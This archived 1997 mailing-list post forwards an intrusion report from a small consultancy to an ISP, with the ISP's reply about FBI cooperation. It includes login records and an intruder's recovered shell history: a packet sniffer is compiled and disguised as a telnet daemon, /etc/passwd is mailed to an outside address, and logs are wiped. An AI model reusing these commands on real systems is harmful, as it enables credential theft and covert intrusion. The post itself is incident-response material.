[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
System Attack & FBI (fwd)
Hi,
For your amusement.
Jim Choate
CyberTects
[email protected]
Forwarded message:
> From [email protected] Fri May 23 23:28:29 1997
> From: Jim Choate <[email protected]>
> Message-Id: <[email protected]>
> Subject: System Attack & FBI
> To: [email protected]
> Date: Fri, 23 May 1997 23:28:27 -0500 (CDT)
> Cc: [email protected]
> X-Mailer: ELM [version 2.4 PL23]
> Content-Type: text
> Content-Length: 7477
>
>
> Hi,
>
> As you will see below I have been tracking a waskelly wabbit for the last
> few weeks. I apologize for any interference with your access but I could
> not let it go without some sort of responce.
>
> I *STRONGLY* advise you to change your password immediately.
>
> I do not expect anyone other than myself to have to talk with the FBI.
>
> If you have any questions please feel free to email me.
>
> Jim Choate
> CyberTects
> [email protected]
>
>
> Forwarded message:
>
> > From [email protected] Fri May 23 23:13:34 1997
> > Message-Id: <[email protected]>
> > X-Sender: [email protected]
> > X-Mailer: Windows Eudora Pro Version 3.0.1 (32)
> > Date: Fri, 23 May 1997 23:43:27 -0500
> > To: Jim Choate <[email protected]>
> > From: rberger <[email protected]>
> > Subject: Re: You have a hacker!
> > In-Reply-To: <[email protected]>
> > Mime-Version: 1.0
> > Content-Type: text/plain; charset="us-ascii"
> >
> > Thank you very much for sending us an e-mail and your logs. We are going
> > through
> > our FTP logs at this time. Although initial results don't show
> > corresponding ftps at these
> > times or files. Although a week ago we were fighting a hacker using the
> > a same
> > techquies as shown by the telnet sessions. So we will be monitoring
> > everything very
> > closely here for a few more days. Our next search will be the accounts
> > logged in on
> > these ports at the times given. We have been working with the FBI, along
> > with several
> > other ISP's in Dallas. If you capture any other logs please send them
> > again to
> > [email protected]. If you dont hear anything from us in less than 24 hours
> > please re-send
> > your e-mail message again to my domain [email protected] just in case the
> > root e-mail/logs are being monitored & modified.
> >
> > Regards,
> >
> > Randall Berger, CEO
> > AppLink Corporation
> >
> >
> > At 10:43 PM 5/23/97 -0500, you wrote:
> > >
> > >Hello,
> > >
> > >
> > > My name is Jim Choate, I own and operate CyberTects a small office - home
> > > office consultancy in Austin, TX. Over the last couple of weeks I have been
> > > tracking an intrusion on my system that has involved your systems. I would
> > > appreciate any help you can provide in resolving this issue.
> > >
> > > I believe a home account for the perp is [email protected]
> > >
> > > I will attach below the relevant files.
> > >
> > >
> > > Jim Choate
> > > CyberTects
> > > [email protected]
> > >
> > > --------------------------------------------------------------------------
> > >
> > > bbixler ttyp0 app42-73.applink Fri May 23 16:04 - 16:06 (00:01)
> > > bbixler ttyp0 app42-75.applink Fri May 23 00:21 - 00:28 (00:07)
> > > bbixler ttyp0 app42-90.applink Thu May 22 13:33 - 13:37 (00:03)
> > > bbixler ttyp0 app41-50.applink Wed May 21 20:01 - 20:31 (00:30)
> > > bbixler ttyp0 app41-47.applink Wed May 21 19:53 - 19:54 (00:00)
> > > bbixler ttyp0 app42-85.applink Wed May 21 18:46 - 19:00 (00:14)
> > > bbixler ttyp0 app42-75.applink Wed May 21 10:39 - 10:40 (00:00)
> > > bbixler ttyp0 app41-52.applink Sun May 18 23:04 - 23:11 (00:07)
> > > bbixler ttyp1 app42-78.applink Sat May 17 18:46 - 18:49 (00:02)
> > > bbixler ttyp1 app42-67.applink Sat May 17 01:22 - 01:26 (00:03)
> > > bbixler ftp fw6-10.ppp.iadfw Wed May 14 22:27 - 22:28 (00:01)
> > > bbixler ttyp1 app42-94.applink Tue May 13 16:12 - 16:18 (00:05)
> > > bbixler ttyp0 app42-85.applink Mon May 12 17:02 - 17:05 (00:02)
> > > bbixler ttyp0 app42-73.applink Sun May 11 12:29 - 12:36 (00:07)
> > > bbixler ttyp0 app42-71.applink Sat May 10 20:15 - 20:17 (00:01)
> > > bbixler ttyp0 app42-71.applink Sat May 10 19:40 - 19:50 (00:09)
> > > bbixler ttyp0 max2-800-04.eart Wed Feb 12 18:05 - 18:06 (00:00)
> > >
> > > wtmp begins Sun Feb 2 16:36
> > >
> > > --------------------------------------------------------------------------
> > >
> > > whoami
> > > ls
> > > mv perl-ex.sh /tmp/.bgg
> > > mkdir /tmp/.bg
> > > cd /tmp
> > > cd .bg
> > > ls
> > > lynx
> > > ls
> > > gcc linsniffer.c
> > > ls
> > > ps
> > > who
> > > w
> > > ps aux
> > > a.out &
> > > ls
> > > ifconfig
> > > /sbin/ifconfig
> > > ls
> > > tail -f tcp.log
> > > free
> > > ls
> > > cat tcp.log
> > > cd ..
> > > ls
> > > w
> > > cd
> > > cd ..
> > > ls
> > > cd ..
> > > cd /etc
> > > ls
> > > minicom
> > > cd ..
> > > ls
> > > cd cdrom.
> > > cd cdrom
> > > ls
> > > cd ..
> > > cd
> > > ls
> > > cd bin
> > > ls
> > > cd ..
> > > cd ..
> > > ls
> > > w
> > > finger
> > > cd Pphantom
> > > cat /etc/passwd | grep Pphantom
> > > cd phantom
> > > ls
> > > ls -al
> > > cat .bash_history
> > > cd /etc
> > > cat hosts
> > > ls
> > > cd /tmp
> > > cd .bg
> > > cat tcp.log
> > > exit
> > > cd .bg
> > > ls
> > > w
> > > ls
> > > ls -al
> > > cat tcp.log
> > > ifconfig
> > > /sbin/ifconfig
> > > ls
> > > exit
> > > mv x.sh /tmp
> > > cd .bg
> > > ls
> > > cd /tmp
> > > ls
> > > mv x.sh .bg
> > > cd .bg
> > > ls
> > > kill -9 14523
> > > ps aux
> > > mv a.out in.telnetd
> > > ls
> > > rm tcp.log
> > > ./in.telnetd &
> > > exit
> > > pico tcp.log
> > > ls
> > > ps aux
> > > kill -9 16282
> > > ls
> > > ./in.telnetd &
> > > exit
> > > cat /dev/null > tcp.log
> > > w
> > > exit
> > > pico tcp.log
> > > ls
> > > ls -al
> > > cd /etc
> > > cat passwd
> > > mail [email protected] < passwd
> > > exit
> > > w
> > > ls -al
> > > pico tcp.log
> > > echo /dev/null > tcp.log
> > > ls -al
> > > ps aux
> > > quit
> > > exit
> > > id
> > > w
> > > ftp
> > > ls
> > > mkdir /home/ftp/.tmp
> > > mkdir /home/ftp/.tmp/.sub
> > > mv linsniff /home/ftp/.tmp/.sub/
> > > cd /home/ftp/.tmp/.sub/
> > > mv linsniff in.te1netd
> > > ls -l
> > > chmod 755 in.te1netd
> > > in.te1netd &
> > > ps
> > > ps aux
> > > killall in.te1netd
> > > ls
> > > ls -a
> > > ls -l
> > > in.te1netd &
> > > /home/ftp/.tmp/.sub/in.te1netd
> > > /home/ftp/.tmp/.sub/in.te1netd
> > > ls -s
> > > rm in.te1netd
> > > cd
> > > ls
> > > mv hello .h311o
> > > ftp
> > > ls
> > > mv linsniffer.c /home/ftp/.tmp/.sub/
> > > cd /home/ftp/.tmp/.sub
> > > ls
> > > cc linsniffer.c
> > > mv a.out in.te1netd
> > > chmod 755 in.te1netd
> > > ls
> > > rm linsniffer.c
> > > in.te1netd &
> > > exit
> > > cd ..
> > > mv apache.tgz .bg
> > > cd .bg
> > > ls
> > > tar xfvz apache.tgz
> > > cd apache_1.2b10/
> > > ls
> > > cd src
> > > make
> > > ls
> > > ./Configure
> > > make
> > > ls
> > > cd ..
> > > ls
> > > cd cgi-bin/
> > > ls
> > > cd ..
> > > ls
> > > cd ..
> > > ls
> > > w
> > > rm -rf apache*
> > > lynx
> > > ls
> > > tar xfvz apache_1.1.3.tar.gz
> > > cd apache_1.1.3
> > > ls
> > > cd src
> > > ls
> > > ./Configure
> > > make
> > > ls
> > > cd ..
> > > ls
> > > cd ..
> > > ls
> > > rm -rf apache_1.1.3
> > > ls
> > > rm -rf apache_1.1.3.tar.gz
> > > w
> > > exit
> > > kill -9 14551
> > > ls
> > > ls -al
> > > cd ..
> > > ls
> > > cd /home
> > > ls
> > > cd ftp
> > > ls -al
> > > cd .tm[p
> > > cd .tmp/
> > > ls
> > > ls -al
> > > cd .sub/
> > > ls
> > > rm *
> > > cd ..
> > > cd ..
> > > rm -rf .tmp/
> > > ls
> > > cd
> > > ls
> > > cd /root
> > > ls
> > > cd ssz
> > > ls
> > > cd ..
> > > ls
> > > cd pgp
> > > ls
> > > cd ..
> > > cd etc
> > > ls
> > > cd ..
> > > ls
> > > cd /
> > > ls
> > > exit
> > > id
> > > crontab -e
> > > ls
> > > vi .sub
> > > crontab -e
> > > ls
> > > cat /home/ftp/.tmp/.sub/tcp.log
> > > ps aux
> > > who
> > > cd /home/ftp
> > > ls -a
> > > mkdir .tmp/.sub
> > > mkdir .tmp
> > > cd .tmp
> > > exit
> > > cd
> > > ls
> > > cd /root
> > > ls
> > > cd khg-0.5/
> > > ls
> > > cd ..
> > > cat .bash_history
> > > ls
> > > cd /etc
> > > ls
> > > cat hosts
> > > exit
> > >
> > >
> > >
> > >
> >
>